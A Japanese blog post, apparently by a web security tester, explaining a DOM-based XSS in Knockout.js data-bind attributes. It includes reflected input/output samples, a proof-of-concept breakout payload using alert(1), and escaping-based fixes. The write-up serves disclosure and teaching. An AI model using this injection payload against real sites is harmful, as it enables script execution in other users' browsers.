最近出会った, Knockout.jsでのDOM based XSSを紹介.

書いてあること

1. XSSが発生するKnockout.jsを使用したHTMLソース（レスポンス）例
2. PoC
3. スクリプトが実行される流れ

前提知識

• XSS（クロスサイト・スクリプティング）

  • 参考: 第2回 Webセキュリティのおさらい その2 XSS：JavaScriptセキュリティの基礎知識｜gihyo.jp … 技術評論社

• JavaScript中のHTMLアンエスケープ

  • 参考: XSS: 今こそXSS対策についてまとめよう - 徳丸浩の日記(2008-08-22)

• Knockout.jsのざっくり仕様（要点のみ）

  • 参考: Knockout.js 使い方メモ - Qiita
  • 参考: ドキュメント | Knockout.js 日本語ドキュメント

HTMLソース（レスポンス）例

• input 1

inputtedaaaaa<'"%26>

• output 1

(snipped)
<script src="./knockout-min.js"></script>
(snipped)
<span data-bind="text: 'Hello Knockout.js', style: {color: 'inputtedaaaaa&lt;&#39;&quot&&gt;'}"></span>
(snipped)

• input 2

inputtedaaaaa,(;:)

• output 2

(snipped)
<script src="./knockout-min.js"></script>
(snipped)
<span data-bind="text: 'Hello Knockout.js', style: {color: 'inputtedaaaaa,(;:)'}"></span>
(snipped)

お分かりいただけただろうか. ご覧の通りXSS可能.

PoC

• input

blue'&alert(1),text:'

• output

<span data-bind="text: 'Hello Knockout.js', style: {color: 'blue&#39;&alert(1),text:&#39;'}"></span>

• HTML

<span data-bind="text: 'Hello Knockout.js', css: {color: 'blue'&alert(1),text:''}">Hello Knockout.js</span>

スクリプトが実行される流れ

1. ブラウザの仕様であるHTMLアンエスケープ（'が'としてJavaScriptエンジンに渡される）
2. Knockout.jsが動いてalertが動作
   • ViewモデルにおいてJavaScriptオブジェクトが使用される, JavaScript式を指定可能

対策

• JavaScriptエスケープ（' → \'）
• Unicodeエスケープ（' → \u0027）

コメントとか小話とか

• BurpSuite 1.7.37, 2.0.X betaでのScanは(Info)Input returned in response (reflected).
• 「これどう思います？」と質問されたのが見つけられた発端. その時にKnockout.jsの存在を知った（ライブラリ多すぎてツラい）.
• ようやくWebに慣れてきた気がする. 職人への道はまだまだ遠い.